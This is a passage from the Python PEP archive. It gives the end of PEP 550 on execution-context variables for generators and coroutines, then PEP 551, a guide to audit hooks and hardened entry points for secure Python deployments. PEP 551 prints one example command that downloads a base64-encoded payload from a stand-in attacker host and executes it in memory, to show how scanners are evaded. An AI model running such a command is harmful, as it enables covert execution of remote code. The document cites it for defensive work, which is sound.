This allows the values of context variables to be properly garbage
collected.
This generic caching approach is similar to what the current C
implementation of decimal does to cache the current decimal
context, and has similar performance characteristics.
Performance Considerations
Tests of the reference implementation based on the prior
revisions of this PEP have shown 1-2% slowdown on generator
microbenchmarks and no noticeable difference in macrobenchmarks.
The performance of non-generator and non-async code is not
affected by this PEP.
Summary of the New APIs
Python
The following new Python APIs are introduced by this PEP:
The new contextvars.ContextVar(name: str='...') class,
instances of which have the following:
the read-only .name attribute,
the .get() method, which returns the value of the variable
in the current execution context;
the .set() method, which sets the value of the variable in
the current logical context;
the .delete() method, which removes the value of the variable
from the current logical context.
The new contextvars.ExecutionContext() class, which represents
an execution context.
The new contextvars.LogicalContext() class, which represents
a logical context.
The new contextvars.get_execution_context() function, which
returns an ExecutionContext instance representing a copy of
the current execution context.
The contextvars.run_with_execution_context(ec: ExecutionContext,
func, *args, **kwargs) function, which runs func with the
provided execution context.
The contextvars.run_with_logical_context(lc: LogicalContext,
func, *args, **kwargs) function, which runs func with the
provided logical context on top of the current execution context.
C API
PyContextVar * PyContext_NewVar(char *desc): create a
PyContextVar object.
PyObject * PyContext_GetValue(PyContextVar *, int topmost):
return the value of the variable in the current execution context.
int PyContext_SetValue(PyContextVar *, PyObject *): set
the value of the variable in the current logical context.
int PyContext_DelValue(PyContextVar *): delete the value of
the variable from the current logical context.
PyLogicalContext * PyLogicalContext_New(): create a new empty
PyLogicalContext.
PyExecutionContext * PyExecutionContext_New(): create a new
empty PyExecutionContext.
PyExecutionContext * PyExecutionContext_Get(): return the
current execution context.
int PyContext_SetCurrent(
PyExecutionContext *, PyLogicalContext *): set the
passed EC object as the current execution context for the active
thread state, and/or set the passed LC object as the current
logical context.
Design Considerations
Should “yield from” leak context changes?
No. It may be argued that yield from is semantically
equivalent to calling a function, and should leak context changes.
However, it is not possible to satisfy the following at the same time:
next(gen) does not leak context changes made in gen, and
yield from gen leaks context changes made in gen.
The reason is that yield from can be used with a partially
iterated generator, which already has local context changes:
var = contextvars.ContextVar('var')
def gen():
for i in range(10):
var.set('gen')
yield i
def outer_gen():
var.set('outer_gen')
g = gen()
yield next(g)
# Changes not visible during partial iteration,
# the goal of this PEP:
assert var.get() == 'outer_gen'
yield from g
assert var.get() == 'outer_gen' # or 'gen'?
Another example would be refactoring of an explicit for..in yield
construct to a yield from expression. Consider the following
code:
def outer_gen():
var.set('outer_gen')
for i in gen():
yield i
assert var.get() == 'outer_gen'
which we want to refactor to use yield from:
def outer_gen():
var.set('outer_gen')
yield from gen()
assert var.get() == 'outer_gen' # or 'gen'?
The above examples illustrate that it is unsafe to refactor
generator code using yield from when it can leak context changes.
Thus, the only well-defined and consistent behaviour is to
always isolate context changes in generators, regardless of
how they are being iterated.
Should PyThreadState_GetDict() use the execution context?
No. PyThreadState_GetDict is based on TLS, and changing its
semantics will break backwards compatibility.
PEP 521
PEP 521 proposes an alternative solution to the problem, which
extends the context manager protocol with two new methods:
__suspend__() and __resume__(). Similarly, the asynchronous
context manager protocol is also extended with __asuspend__() and
__aresume__().
This allows implementing context managers that manage non-local state,
which behave correctly in generators and coroutines.
For example, consider the following context manager, which uses
execution state:
class Context:
def __init__(self):
self.var = contextvars.ContextVar('var')
def __enter__(self):
self.old_x = self.var.get()
self.var.set('something')
def __exit__(self, *err):
self.var.set(self.old_x)
An equivalent implementation with PEP 521:
local = threading.local()
class Context:
def __enter__(self):
self.old_x = getattr(local, 'x', None)
local.x = 'something'
def __suspend__(self):
local.x = self.old_x
def __resume__(self):
local.x = 'something'
def __exit__(self, *err):
local.x = self.old_x
The downside of this approach is the addition of significant new
complexity to the context manager protocol and the interpreter
implementation. This approach is also likely to negatively impact
the performance of generators and coroutines.
Additionally, the solution in PEP 521 is limited to context
managers, and does not provide any mechanism to propagate state in
asynchronous tasks and callbacks.
Can Execution Context be implemented without modifying CPython?
No.
It is true that the concept of “task-locals” can be implemented
for coroutines in libraries (see, for example, [29] and [30]).
On the other hand, generators are managed by the Python interpreter
directly, and so their context must also be managed by the
interpreter.
Furthermore, execution context cannot be implemented in a third-party
module at all; otherwise the standard library, including decimal,
would not be able to rely on it.
Should we update sys.displayhook and other APIs to use EC?
APIs like redirecting stdout by overwriting sys.stdout, or
specifying new exception display hooks by overwriting the
sys.displayhook function are affecting the whole Python process
by design. Their users assume that the effect of changing
them will be visible across OS threads. Therefore, we cannot
simply make these APIs use the new Execution Context.
That said, we think it is possible to design new APIs that will
be context aware, but that is outside the scope of this PEP.
Greenlets
Greenlet is an alternative implementation of cooperative
scheduling for Python. Although the greenlet package is not part of
CPython, popular frameworks like gevent rely on it, and it is
important that greenlet can be modified to support execution
contexts.
Conceptually, the behaviour of greenlets is very similar to that of
generators, which means that similar changes around greenlet entry
and exit can be done to add support for execution context. This
PEP provides the necessary C APIs to do that.
Context manager as the interface for modifications
This PEP concentrates on the low-level mechanics and the minimal
API that enables fundamental operations with execution context.
For developer convenience, a high-level context manager interface
may be added to the contextvars module. For example:
with contextvars.set_var(var, 'foo'):
# ...
Setting and restoring context variables
The ContextVar.delete() method removes the context variable from
the topmost logical context.
If the variable is not found in the topmost logical context, a
LookupError is raised, similarly to del var raising
NameError when var is not in scope.
This method is useful when there is a (rare) need to correctly restore
the state of a logical context, such as when a nested generator
wants to modify the logical context temporarily:
var = contextvars.ContextVar('var')
def gen():
with some_var_context_manager('gen'):
# EC = [{var: 'main'}, {var: 'gen'}]
assert var.get() == 'gen'
yield
# EC = [{var: 'main modified'}, {}]
assert var.get() == 'main modified'
yield
def main():
var.set('main')
g = gen()
next(g)
var.set('main modified')
next(g)
The above example would work correctly only if there is a way to
delete var from the logical context in gen(). Setting it
to a “previous value” in __exit__() would mask changes made
in main() between the iterations.
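A some_var_context_manager() helper that follows this rule could look
as follows (a hypothetical sketch using the module-level var from the
example and the proposed set(), get(topmost=True), and delete()
methods):
import contextlib

_MISSING = object()

@contextlib.contextmanager
def some_var_context_manager(value):
    # Restore a previous value only if one existed in the *topmost*
    # logical context; otherwise delete(), so that outer changes made
    # between generator iterations remain visible afterwards.
    old = var.get(topmost=True, default=_MISSING)
    var.set(value)
    try:
        yield
    finally:
        if old is _MISSING:
            var.delete()
        else:
            var.set(old)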
Alternative Designs for ContextVar API
Logical Context with stacked values
By the design presented in this PEP, logical context is a simple
LC({ContextVar: value, ...}) mapping. An alternative
representation is to store a stack of values for each context
variable: LC({ContextVar: [val1, val2, ...], ...}).
The ContextVar methods would then be:
get(*, default=None) – traverses the stack
of logical contexts, and returns the top value from the
first non-empty logical context;
push(val) – pushes val onto the stack of values in the
current logical context;
pop() – pops the top value from the stack of values in
the current logical context.
Compared to the single-value design with the set() and
delete() methods, the stack-based approach allows for a simpler
implementation of the set/restore pattern. However, the mental
burden of this approach is considered to be higher, since there
would be two stacks to consider: a stack of LCs and a stack of
values in each LC.
(This idea was suggested by Nathaniel Smith.)
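For comparison, under the stacked-values design the set/restore
pattern collapses into a symmetric push/pop pair (push() and pop()
belong to this rejected alternative, not to the API proposed by this
PEP):
import contextlib

@contextlib.contextmanager
def temporary_value(var, value):
    var.push(value)  # shadow whatever value was visible before
    try:
        yield
    finally:
        var.pop()    # restore the previous value (or its absence)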
ContextVar “set/reset”
Yet another approach is to return a special object from
ContextVar.set(), which would represent the modification of
the context variable in the current logical context:
var = contextvars.ContextVar('var')
def foo():
mod = var.set('spam')
# ... perform work
mod.reset() # Reset the value of var to the original value
# or remove it from the context.
The critical flaw in this approach is that it becomes possible to
pass context var “modification objects” into code running in a
different execution context, which leads to undefined side effects.
Backwards Compatibility
This proposal preserves 100% backwards compatibility.
Rejected Ideas
Replication of threading.local() interface
Choosing the threading.local()-like interface for context
variables was considered and rejected for the following reasons:
A survey of the standard library and Django has shown that the
vast majority of threading.local() uses involve a single
attribute, which indicates that the namespace approach is not
as helpful in the field.
Using __getattr__() instead of .get() for value lookup
does not provide any way to specify the depth of the lookup
(i.e. search only the top logical context).
Single-value ContextVar is easier to reason about in terms
of visibility. Suppose ContextVar() is a namespace,
and consider the following:
ns = contextvars.ContextVar('ns')
def gen():
ns.a = 2
yield
assert ns.b == 'bar' # ??
def main():
ns.a = 1
ns.b = 'foo'
g = gen()
next(g)
# should not see the ns.a modification in gen()
assert ns.a == 1
# but should gen() see the ns.b modification made here?
ns.b = 'bar'
next(g)
The above example demonstrates that reasoning about the visibility
of different attributes of the same context var is not trivial.
Single-value ContextVar allows straightforward implementation
of the lookup cache;
Single-value ContextVar interface allows the C-API to be
simple and essentially the same as the Python API.
See also the mailing list discussion: [26], [27].
Coroutines not leaking context changes by default
In V4 (Version History) of this PEP, coroutines were considered to
behave exactly like generators with respect to the execution context:
changes in awaited coroutines were not visible in the outer coroutine.
This idea was rejected on the grounds that it breaks the semantic
similarity of the task and thread models, and, more specifically,
makes it impossible to reliably implement asynchronous context
managers that modify context vars, since __aenter__ is a
coroutine.
Appendix: HAMT Performance Analysis
Figure 1. Benchmark code can be found here: [9].
The above chart demonstrates that:
HAMT displays near O(1) performance for all benchmarked
dictionary sizes.
dict.copy() becomes very slow around 100 items.
Figure 2. Benchmark code can be found here: [10].
Figure 2 compares the lookup costs of dict versus a HAMT-based
immutable mapping. HAMT lookup time is 30-40% slower than Python dict
lookups on average, which is a very good result, considering that the
latter is very well optimized.
There is research [8] showing that there are further possible
improvements to the performance of HAMT.
The reference implementation of HAMT for CPython can be found here:
[7].
Acknowledgments
Thanks to Victor Petrovykh for countless discussions around the topic
and PEP proofreading and edits.
Thanks to Nathaniel Smith for proposing the ContextVar design
[17] [18], for pushing the PEP towards a more complete design, and
coming up with the idea of having a stack of contexts in the thread
state.
Thanks to Alyssa (Nick) Coghlan for numerous suggestions and ideas on the
mailing list, and for coming up with a case that caused the complete
rewrite of the initial PEP version [19].
Version History
Initial revision, posted on 11-Aug-2017 [20].
V2 posted on 15-Aug-2017 [21].
The fundamental limitation that caused a complete redesign of the
first version was that it was not possible to implement an iterator
that would interact with the EC in the same way as generators
(see [19].)
Version 2 was a complete rewrite, introducing new terminology
(Local Context, Execution Context, Context Item) and new APIs.
V3 posted on 18-Aug-2017 [22]. Updates:
Local Context was renamed to Logical Context. The term “local”
was ambiguous and conflicted with local name scopes.
Context Item was renamed to Context Key, see the thread with Alyssa
Coghlan, Stefan Krah, and Yury Selivanov [23] for details.
Context Item get cache design was adjusted, per Nathaniel Smith’s
idea in [25].
Coroutines are created without a Logical Context; ceval loop
no longer needs to special case the await expression
(proposed by Alyssa Coghlan in [24].)
V4 posted on 25-Aug-2017 [31].
The specification section has been completely rewritten.
Coroutines now have their own Logical Context. This means
there is no difference between coroutines, generators, and
asynchronous generators w.r.t. interaction with the Execution
Context.
Context Key renamed to Context Var.
Removed the distinction between generators and coroutines with
respect to logical context isolation.
V5 posted on 01-Sep-2017: the current version.
Coroutines have no logical context by default (a revert to the V3
semantics). Read about the motivation in the
Coroutines not leaking context changes by default section.
The High-Level Specification section was also updated
(specifically Generators and Coroutines subsections).
All APIs have been placed to the contextvars module, and
the factory functions were changed to class constructors
(ContextVar, ExecutionContext, and LogicalContext).
Thanks to Alyssa for the idea [33].
ContextVar.lookup() got renamed back to ContextVar.get()
and gained the topmost and default keyword arguments.
Added ContextVar.delete(). See Guido's comment in [32].
New ExecutionContext.vars() method. Read about it in
the Enumerating context vars section.
Fixed ContextVar.get() cache bug (thanks Nathaniel!).
New Rejected Ideas,
Should “yield from” leak context changes?,
Alternative Designs for ContextVar API,
Setting and restoring context variables, and
Context manager as the interface for modifications sections.
References
[1]
https://go.dev/blog/context
[2]
https://docs.microsoft.com/en-us/dotnet/api/system.threading.executioncontext
[3]
https://github.com/numpy/numpy/issues/9444
[5]
https://en.wikipedia.org/wiki/Hash_array_mapped_trie
[6]
https://blog.higher-order.net/2010/08/16/assoc-and-clojures-persistenthashmap-part-ii.html
[7]
https://github.com/1st1/cpython/tree/hamt
[8]
https://michael.steindorfer.name/publications/oopsla15.pdf
[9]
https://gist.github.com/1st1/9004813d5576c96529527d44c5457dcd
[10]
https://gist.github.com/1st1/dbe27f2e14c30cce6f0b5fddfc8c437e
[17]
https://mail.python.org/pipermail/python-ideas/2017-August/046752.html
[18]
https://mail.python.org/pipermail/python-ideas/2017-August/046772.html
[19]
https://mail.python.org/pipermail/python-ideas/2017-August/046775.html
[20]
https://github.com/python/peps/blob/e8a06c9a790f39451d9e99e203b13b3ad73a1d01/pep-0550.rst
[21]
https://github.com/python/peps/blob/e3aa3b2b4e4e9967d28a10827eed1e9e5960c175/pep-0550.rst
[22]
https://github.com/python/peps/blob/287ed87bb475a7da657f950b353c71c1248f67e7/pep-0550.rst
[23]
https://mail.python.org/pipermail/python-ideas/2017-August/046801.html
[24]
https://mail.python.org/pipermail/python-ideas/2017-August/046790.html
[25]
https://mail.python.org/pipermail/python-ideas/2017-August/046786.html
[26]
https://mail.python.org/pipermail/python-ideas/2017-August/046888.html
[27]
https://mail.python.org/pipermail/python-ideas/2017-August/046889.html
[28]
https://docs.python.org/3/library/decimal.html#decimal.Context.abs
[29]
https://web.archive.org/web/20170706074739/https://curio.readthedocs.io/en/latest/reference.html#task-local-storage
[30]
https://docs.atlassian.com/aiolocals/latest/usage.html
[31]
https://github.com/python/peps/blob/1b8728ded7cde9df0f9a24268574907fafec6d5e/pep-0550.rst
[32]
https://mail.python.org/pipermail/python-dev/2017-August/149020.html
[33]
https://mail.python.org/pipermail/python-dev/2017-August/149043.html
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 550 – Execution Context | Standards Track | This PEP adds a new generic mechanism of ensuring consistent access
to non-local state in the context of out-of-order execution, such
as in Python generators and coroutines. |
PEP 551 – Security transparency in the Python runtime
Author:
Steve Dower <steve.dower at python.org>
Status:
Withdrawn
Type:
Informational
Created:
23-Aug-2017
Python-Version:
3.7
Post-History:
24-Aug-2017, 28-Aug-2017
Table of Contents
Relationship to PEP 578
Abstract
Background
Summary Recommendations
Restricting the Entry Point
General Recommendations
Things not to do
Further Reading
References
Acknowledgments
Copyright
Note
This PEP has been withdrawn. For information about integrating
CPython into a secure environment, we recommend consulting your own
security experts.
Relationship to PEP 578
This PEP has been split into two since its original posting.
See PEP 578 for the
auditing APIs proposed for addition to the next version of Python.
This is now an informational PEP, providing guidance to those planning
to integrate Python into their secure or audited environments.
Abstract
This PEP describes the concept of security transparency and how it
applies to the Python runtime. Visibility into actions taken by the
runtime is invaluable in integrating Python into an otherwise secure
and/or monitored environment.
The audit hooks described in PEP 578 are an essential component in
detecting, identifying and analyzing misuse of Python. While the hooks
themselves are neutral (in that not every reported event is inherently
misuse), they provide essential context to those who are responsible
for monitoring an overall system or network. With enough transparency,
attackers are no longer able to hide.
Background
Software vulnerabilities are generally seen as bugs that enable remote
or elevated code execution. However, in our modern connected world, the
more dangerous vulnerabilities are those that enable advanced persistent
threats (APTs). APTs are achieved when an attacker is able to penetrate
a network, establish their software on one or more machines, and over
time extract data or intelligence. Some APTs may make themselves known
by maliciously damaging data (e.g., WannaCrypt)
or hardware (e.g., Stuxnet).
Most attempt to hide their existence and avoid detection. APTs often use
a combination of traditional vulnerabilities, social engineering,
phishing (or spear-phishing), thorough network analysis, and an
understanding of misconfigured environments to establish themselves and
do their work.
The first infected machines may not be the final target and may not
require special privileges. For example, an APT that is established as a
non-administrative user on a developer’s machine may have the ability to
spread to production machines through normal deployment channels. It is
common for APTs to persist on as many machines as possible, with sheer
weight of presence making them difficult to remove completely.
Whether an attacker is seeking to cause direct harm or hide their
tracks, the biggest barrier to detection is a lack of insight. System
administrators with large networks rely on distributed logs to
understand what their machines are doing, but logs are often filtered to
show only error conditions. APTs that are attempting to avoid detection
will rarely generate errors or abnormal events. Reviewing normal
operation logs involves a significant amount of effort, though work is
underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that
are already installed on the target machines, since log messages from
these tools are often expected and ignored in normal use.
At this point, we are not going to spend further time discussing the
existence of APTs or methods and mitigations that do not apply to this
PEP. For further information about the field, we recommend reading or
watching the resources listed under Further Reading.
Python is a particularly interesting tool for attackers due to its
prevalence on server and developer machines, its ability to execute
arbitrary code provided as data (as opposed to native binaries), and its
complete lack of internal auditing. This allows attackers to download,
decrypt, and execute malicious code with a single command:
python -c "import urllib.request, base64;
exec(base64.b64decode(
urllib.request.urlopen('http://my-exploit/py.b64')
).decode())"
This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being
written to disk (base64 is often sufficient to bypass these checks). It
also bypasses protections such as file access control lists or
permissions (no file access occurs), approved application lists
(assuming Python has been approved for other uses), and automated
auditing or logging (assuming Python is allowed to access the internet
or access another machine on the local network from which to obtain its
payload).
General consensus among the security community is that totally
preventing attacks is infeasible and defenders should assume that they
will often detect attacks only after they have succeeded. This is known
as the “assume breach” mindset. [1] In this scenario, protections such
as sandboxing and input validation have already failed, and the
important task is detection, tracking, and eventual removal of the
malicious code. To this end, the primary feature required from Python is
security transparency: the ability to see what operations the Python
runtime is performing that may indicate anomalous or malicious use.
Preventing such use is valuable, but secondary to the need to know that
it is occurring.
To summarise the goals in order of increasing importance:
preventing malicious use is valuable
detecting malicious use is important
detecting attempts to bypass detection is critical
One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]
Generally, application and system configuration will determine which
events within a scripting engine are worth logging. However, given that
the value of many logged events is not recognized until after an attack is
detected, it is important to capture as much as possible and filter
views rather than filtering at the source (see the No Easy Breach video
from Further Reading). Events that are always of interest include
attempts to bypass auditing, attempts to load and execute code that is
not correctly signed or access-controlled, use of uncommon operating
system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.
To summarize, defenders have a need to audit specific uses of Python in
order to detect abnormal or malicious usage. With PEP 578, the Python
runtime gains the ability to provide this. The aim of this PEP is to
assist system administrators with deploying a security transparent
version of Python that can integrate with their existing auditing and
protection systems.
On Windows, some specific features that may be integrated through the
hooks added by PEP 578 include:
Script Block Logging [3]
DeviceGuard [4]
AMSI [5]
Persistent Zone Identifiers [6]
Event tracing (which includes event forwarding) [7]
On Linux, some specific features that may be integrated are:
gnupg [8]
sd_journal [9]
OpenBSM [10]
syslog [11]
auditd [12]
SELinux labels [13]
check execute bit on imported modules
On macOS, some features that may be integrated are:
OpenBSM [10]
syslog [11]
Overall, the ability to enable these platform-specific features on
production machines is highly appealing to system administrators and
will make Python a more trustworthy dependency for application
developers.
True security transparency is not fully achievable by Python in
isolation. The runtime can audit as many events as it likes, but unless
the logs are reviewed and analyzed there is no value. Python may impose
restrictions in the name of security, but usability may suffer.
Different platforms and environments will require different
implementations of certain security features, and organizations with the
resources to fully customize their runtime should be encouraged to do
so.
Summary Recommendations
These are discussed in greater detail in later sections, but are
presented here to frame the overall discussion.
Sysadmins should provide and use an alternate entry point (besides
python.exe or pythonX.Y) in order to reduce surface area and
securely enable audit hooks. A discussion of what could be restricted
is below in Restricting the Entry Point.
Sysadmins should use all available measures provided by their operating
system to prevent modifications to their Python installation, such as
file permissions, access control lists and signature validation.
Sysadmins should log everything and collect logs to a central location
as quickly as possible - avoid keeping logs on outer-ring machines.
Sysadmins should prioritize _detection_ of misuse over _prevention_ of
misuse.
Restricting the Entry Point
One of the primary vulnerabilities exposed by the presence of Python
on a machine is the ability to execute arbitrary code without
detection or verification by the system. This is made significantly
easier because the default entry point (python.exe on Windows and
pythonX.Y on other platforms) allows execution from the command
line, from standard input, and does not have any hooks enabled by
default.
Our recommendation is that production machines should use a modified
entry point instead of the default. Once outside of the development
environment, there is rarely a need for the flexibility offered by the
default entry point.
In this section, we describe a hypothetical spython entry point
(spython.exe on Windows; spythonX.Y on other platforms) that
provides a level of security transparency recommended for production
machines. An associated example implementation shows many of the
features described here, though with a number of concessions for the
sake of avoiding platform-specific code. A sufficient implementation
will inherently require some integration with platform-specific
security features.
Official distributions will not include any spython by default, but
third party distributions may include appropriately modified entry
points that use the same name.
Remove most command-line arguments
The spython entry point requires a script file be passed as the
first argument, and does not allow any options to precede it. This
prevents arbitrary code execution from in-memory data or non-script
files (such as pickles, which could be executed using
-m pickle <path>).
Options -B (do not write bytecode), -E (ignore environment
variables) and -s (no user site) are assumed.
If a file with the same full path as the process with a ._pth suffix
(spython._pth on Windows, spythonX.Y._pth on Linux) exists, it
will be used to initialize sys.path following the rules currently
described for Windows.
For the sake of demonstration, the example implementation of
spython also allows the -i option to start in interactive mode.
This is not recommended for restricted entry points.
Log audited events
Before initialization, spython sets an audit hook that writes all
audited events to an OS-managed log file. On Windows, this is the Event
Tracing functionality [7], and on other platforms they go to
syslog [11]. Logs are copied from the machine as frequently as possible
to prevent loss of information should an attacker attempt to clear
local logs or prevent legitimate access to the machine.
The audit hook will also abort all sys.addaudithook events,
preventing any other hooks from being added.
The logging hook is written in native code and configured before the
interpreter is initialized. This is the only opportunity to ensure that
no Python code executes without auditing, and that Python code cannot
prevent registration of the hook.
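For illustration only, the following is a rough Python-level sketch of such a
hook, using the sys.addaudithook API added by PEP 578; a production spython
would register the equivalent hook in C before Py_Initialize and forward
events to ETW or syslog rather than standard error:

import sys

def security_log_hook(event, args):
    # Sketch only: record every audited event somewhere an attacker
    # cannot easily erase (here, just standard error).
    print(f"audit: {event} {args!r}", file=sys.__stderr__)
    # Abort attempts to register further hooks: raising from the
    # "sys.addaudithook" event prevents the new hook from being added.
    if event == "sys.addaudithook":
        raise RuntimeError("blocked attempt to add an audit hook")

sys.addaudithook(security_log_hook)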
Our primary aim is to record all actions taken by all Python processes,
so that detection may be performed offline against logged events.
Having all events recorded also allows for deeper analysis and the use
of machine learning algorithms. These are useful for detecting
persistent attacks, where the attacker is intending to remain within
the protected machines for some period of time, as well as for later
analysis to determine the impact and exposure caused by a successful
attack.
The example implementation of spython writes to a log file on the
local machine, for the sake of demonstration. When started with -i,
the example implementation writes all audit events to standard error
instead of the log file. The SPYTHONLOG environment variable can be
used to specify the log file location.
Restrict importable modules
Also before initialization, spython sets an open-for-import hook
that validates all files opened with os.open_for_import. This
implementation requires all files to have a .py suffix (preventing
the use of cached bytecode), and will raise a custom audit event
spython.open_for_import containing (filename, True_if_allowed).
After opening the file, the entire contents is read into memory in a
single buffer and the file is closed.
Compilation will later trigger a compile event, so there is no need
to validate the contents now using mechanisms that also apply to
dynamically generated code. However, if a whitelist of source files or
file hashes is available, then other validation mechanisms such as
DeviceGuard [4] should be performed here.
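As a sketch only, the validation policy such a hook applies might look like
the following Python; the hook registration itself happens in C using the
provisional APIs described in PEP 578, os.open_for_import is the provisional
name used there, and returning the raw bytes stands in for the real hook's
behaviour:

import sys

def open_for_import(path):
    # Sketch of the policy only: allow plain .py source files and refuse
    # cached bytecode or arbitrary data files.
    allowed = path.endswith(".py")
    sys.audit("spython.open_for_import", path, allowed)
    if not allowed:
        raise OSError(f"import blocked for non-source file: {path}")
    # Read the whole file into a single buffer, then close it immediately.
    with open(path, "rb") as f:
        return f.read()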
Restrict globals in pickles
The spython entry point will abort all pickle.find_class events
that use the default implementation. Overrides will not raise audit
events unless explicitly added, and so they will continue to be allowed.
Prevent os.system
The spython entry point aborts all os.system calls.
It should be noted here that subprocess.Popen(shell=True) is
allowed (though logged via the platform-specific process creation
events). This tradeoff is made because it is much simpler to induce a
running application to call os.system with a single string argument
than a function with multiple arguments, and so it is more likely to be
used as part of an exploit. There is also little justification for
using os.system in production code, while subprocess.Popen has
a large number of legitimate uses. However, logs indicating use of
the shell=True argument should be scrutinised more carefully.
Sysadmins are encouraged to make these kinds of tradeoffs between
restriction and detection, and generally should prefer detection.
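A hedged sketch of how an audit hook might implement both of the restrictions
above, composing with the logging hook shown earlier (pickle.find_class and
os.system are the event names raised by the standard library under PEP 578;
for brevity this ignores the distinction drawn above between the default
find_class implementation and overrides):

import sys

def hardening_hook(event, args):
    if event in ("pickle.find_class", "os.system"):
        # Log first, then abort: knowing the attempt happened matters
        # more than stopping it.
        print(f"audit: blocked {event} {args!r}", file=sys.__stderr__)
        raise RuntimeError(f"{event} is not permitted on this host")

sys.addaudithook(hardening_hook)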
General Recommendations
Recommendations beyond those suggested in the previous section are
difficult, as the ideal configuration for any environment depends on
the sysadmin’s ability to manage, monitor, and respond to activity on
their own network. Nonetheless, here we attempt to provide some context
and guidance for integrating Python into a complete system.
This section provides recommendations using the terms should (or
should not), indicating that we consider it risky to ignore the
advice, and may, indicating that the advice ought to be
considered for high value systems. The term sysadmin refers to
whoever is responsible for deploying Python throughout the network;
different organizations may have an alternative title for the
responsible people.
Sysadmins should build their own entry point, likely starting from
the spython source, and directly interface with the security systems
available in their environment. The more tightly integrated, the less
likely a vulnerability will be found allowing an attacker to bypass
those systems. In particular, the entry point should not obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.
Audit messages should not be written to a local file. The
spython entry point does this for example and testing purposes. On
production machines, tools such as ETW [7] or auditd [12] that are
intended for this purpose should be used.
The default python entry point should not be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins may consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.
Sysadmins may deploy their own entry point as python to obscure
the fact that extra auditing is being included.
Python deployments should be made read-only using any available
platform functionality after deployment and during use.
On platforms that support it, sysadmins should include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4] to validate signatures either automatically or using an
open_for_import hook.
Sysadmins should log as many audited events as possible, and
should copy logs off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable auditing. Audit hooks should
not attempt to preemptively filter events, as even benign events are
useful when analyzing the progress of an attack. (Watch the “No Easy
Breach” video under Further Reading for a deeper look at this side of
things.)
Most actions should not be aborted if they could ever occur during
normal use or if preventing them will encourage attackers to work around
them. As described earlier, awareness is a higher priority than
prevention. Sysadmins may audit their Python code and abort
operations that are known to never be used deliberately.
Audit hooks should write events to logs before attempting to abort.
As discussed earlier, it is more important to record malicious actions
than to prevent them.
Sysadmins should identify correlations between events, as a change
to correlated events may indicate misuse. For example, module imports
will typically trigger the import auditing event, followed by an
open_for_import call and usually a compile event. Attempts to
bypass auditing will often suppress some but not all of these events. So
if the log contains import events but not compile events,
investigation may be necessary.
The first audit hook should be set in C code before
Py_Initialize is called, and that hook should unconditionally
abort the sys.addaudithook event. The Python interface is primarily
intended for testing and development.
To prevent audit hooks being added on non-production machines, an entry
point may add an audit hook that aborts the sys.addaudithook event
but otherwise does nothing.
On production machines, a non-validating open_for_import hook
may be set in C code before Py_Initialize is called. This
prevents later code from overriding the hook, however, logging the
setopenforexecutehandler event is useful since no code should ever
need to call it. Using at least the sample open_for_import hook
implementation from spython is recommended.
Since importlib’s use of open_for_import may be easily bypassed
with monkeypatching, an audit hook should be used to detect
attribute changes on type objects.
Things not to do
This section discusses common or “obviously good” recommendations that
we are specifically not making. These range from useless or incorrect
through to ideas that are simply not feasible in any real world
environment.
Do not attempt to implement a sandbox within the Python runtime.
There is a long history of attempts to allow arbitrary code limited use
of Python features (such as [14]), but no general success. The best
options are to run unrestricted Python within a sandboxed environment
with at least hypervisor-level isolation, or to prevent unauthorised
code from starting at all.
Do not rely on static analysis to verify untrusted code before use.
The best options are to pre-authorise trusted code, such as with code
signing, and if not possible to identify known-bad code, such as with
an anti-malware scanner.
Do not use audit hooks to abort operations without logging the
event first. You will regret not knowing why your process disappeared.
[TODO - more bad advice]
Further Reading
Redefining Malware: When Old Terms Pose New Threats
By Aviv Raff for SecurityWeek, 29th January 2014
This article, and those linked by it, are high-level summaries of the rise of
APTs and the differences from “traditional” malware.
http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats
Anatomy of a Cyber Attack
By FireEye, accessed 23rd August 2017
A summary of the techniques used by APTs, and links to a number of relevant
whitepapers.
https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html
Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection
By Aviv Raff for SecurityWeek, 8th May 2014
High-level summary of the value of detailed logging and automatic analysis.
http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection
No Easy Breach: Challenges and Lessons Learned from an Epic Investigation
Video presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016
Detailed walkthrough of the processes and tools used in detecting and removing
an APT.
https://archive.org/details/No_Easy_Breach
Disrupting Nation State Hackers
Video presented by Rob Joyce for the NSA at USENIX Enigma 2016
Good security practices, capabilities and recommendations from the chief of
NSA’s Tailored Access Operation.
https://www.youtube.com/watch?v=bDJb8WOJYdA
References
[1]
Assume Breach Mindset, http://asian-power.com/node/11144
[2]
PowerShell Loves the Blue Team, also known as Scripting Security and
Protection Advances in Windows 10, https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
[3]
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
[4]
https://aka.ms/deviceguard
[5]
Antimalware Scan Interface, https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx
[6]
Persistent Zone Identifiers, https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx
[7]
Event tracing, https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx
[8]
https://www.gnupg.org/
[9]
https://www.systutorials.com/docs/linux/man/3-sd_journal_send/
[10]
http://www.trustedbsd.org/openbsm.html
[11]
https://linux.die.net/man/3/syslog
[12]
http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/
[13]
SELinux access decisions http://man7.org/linux/man-pages/man3/avc_entry_ref_init.3.html
[14]
The failure of pysandbox https://lwn.net/Articles/574215/
Acknowledgments
Thanks to all the people from Microsoft involved in helping make the
Python runtime safer for production use, and especially to James Powell
for doing much of the initial research, analysis and implementation, Lee
